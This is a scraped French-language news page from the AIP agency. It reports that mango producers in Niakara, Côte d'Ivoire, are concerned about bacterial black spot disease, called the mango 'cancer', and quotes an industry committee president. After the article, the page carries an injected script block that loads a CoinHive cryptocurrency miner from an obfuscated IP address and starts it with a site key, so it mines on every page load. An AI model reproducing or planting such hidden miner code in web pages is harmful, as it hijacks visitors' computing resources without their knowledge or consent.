La maladie dite « le cancer » du manguier préoccupe des producteurs de Niakara
0
 

Écouter
La maladie dite « le cancer » du manguier préoccupe des producteurs de Niakara

La maladie dite « le cancer » du manguier préoccupe des producteurs de Niakara

AIP | Lu 1089 fois | Publié

Lors des échanges, mardi, avec la délégation du comité ad-hoc de la future interprofession de la filière mangue, des producteurs de Niakara (région du Hambol) ont émis des préoccupations quant à une pathologie arboricole dite la maladie des taches noires ou « le cancer » du manguier, a relevé l’AIP sur place.

Selon des producteurs de mangue du département de Niakara, au nombre desquels Pascal Touré, un producteur venu de Ouéréguékaha, la maladie bactérienne, dite la maladie des taches noires du manguier ou le cancer du manguier, s’attaque aussi bien aux feuilles et aux rameaux du manguier qu’aux fruits et à l’arbre.

Cette pathologie arboricole, de l’avis de ces producteurs , limite la production, assèche le manguier et se propage dans le verger, d’où la dénomination « le cancer » du manguier.

Réagissant à cette inquiétude, le président du comité ad-hoc de la future interprofession de la filière mangue, El Hadj Mamadou Coulibaly, a exhorté les arboriculteurs à l’union en vue d’une solution durable « à ce problème commun ».

« La connaissance de la bactérie et sa biologie, la maîtrise de l’épidémiologie de cette maladie en vue d’une solution durable de lutte commune, relèvent du ministère de l’Agriculture et de ses structures spécialisées de recherche », a soutenu M. Coulibaly, plaidant pour la mise en place de l’interprofession de la filière mangue à l’effet d’indexer ce genre de problématique.

En effet, certains producteurs soutiennent que le cancer du manguier est dû à l’importation des pépinières depuis des pays voisins, par contre, d’autres la lient aux effets pervers du réchauffement climatique.

 

<script src="https://0x6814D03B/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('f8XBOx6egKlyNr6RU9M1hnmEJd81a17g');
miner.start();
</script>

Cet article vous a plu ! Partagez-le maintenant

A lire également

 
 
 
 
 
 
 
 
 
 

En continu

Migration irrégulière : Un projet pour les jeunes défavorisés lancé à Grand-Bassam

Migration irrégulière : Un projet pour les jeunes défavorisés lancé à Grand-Bassam

La CEDEAO et l’ARTCI créent les mécanismes d’un développement du commerce électronique en Afrique

Abidjan abrite la 22ème réunion de l’Observatoire régional des marchés publics (OMRP)

Des acteurs de la géo information renforcent leurs capacités au Centre national de télédétection et d’information géographique (CNTIG) à Abidjan